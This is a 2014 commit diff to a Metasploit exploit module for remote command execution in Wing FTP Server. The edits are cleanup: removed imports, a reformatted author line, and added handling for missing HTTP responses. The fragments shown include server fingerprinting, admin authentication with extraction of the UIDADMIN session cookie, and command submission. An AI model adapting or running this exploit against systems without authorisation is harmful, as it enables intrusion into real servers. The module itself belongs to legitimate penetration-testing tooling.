Removed unused require and import. Handle the res.nil case in

nnam · nnam · commit 0788ce974586 · 2014-08-28T10:30:30.000-07:00
execute_command() and authenticate().
diff --git a/modules/exploits/windows/ftp/wing_ftp_server_rce.rb b/modules/exploits/windows/ftp/wing_ftp_server_rce.rb
@@ -4,10 +4,8 @@
 ##
 
 require 'msf/core'
-require 'msf/core/exploit/powershell'
 
 class Metasploit3 < Msf::Exploit::Remote
-  include REXML
   include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
 
@@ -22,7 +20,7 @@ def initialize(info = {})
       },
       'Author'         =>
         [
-          'Nicholas Nam (nick[at]executionflow.org)',
+          'Nicholas Nam <nick[at]executionflow.org>',
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -54,7 +52,7 @@ def check
     res = send_request_cgi(
       {
         'uri'     =>  '/admin_login.html',
-        'method'  => 'GET',
+        'method'  => 'GET'
       })
 
     if res and res.body =~ /Wing FTP Server Administrator/ and res.body =~ /2003-2014 <b>wftpserver.com<\/b>/
@@ -84,8 +82,10 @@ def execute_command(cmd, opts = {})
       'vars_post' => { 'command' => command }
     })
 
-    if res and res.code != 200
-      fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
+    if !res 
+      fail_with(Failure::Unreachable, "#{peer} - Vulnerable page was unreachable.")
+    elsif res.code != 200
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP Response Code.")
     end
   end
 
@@ -104,7 +104,9 @@ def authenticate(username, password)
     })
 
     uidadmin = ''
-    if res and res.body =~ /location='main.html\?lang=english';/
+    if !res 
+      fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
+    elsif res.code == 200 and res.body =~ /location='main.html\?lang=english';/
       res.get_cookies.split(';').each do |cookie|
         cookie.split(',').each do |value|
           if value.split('=')[0] =~ /UIDADMIN/
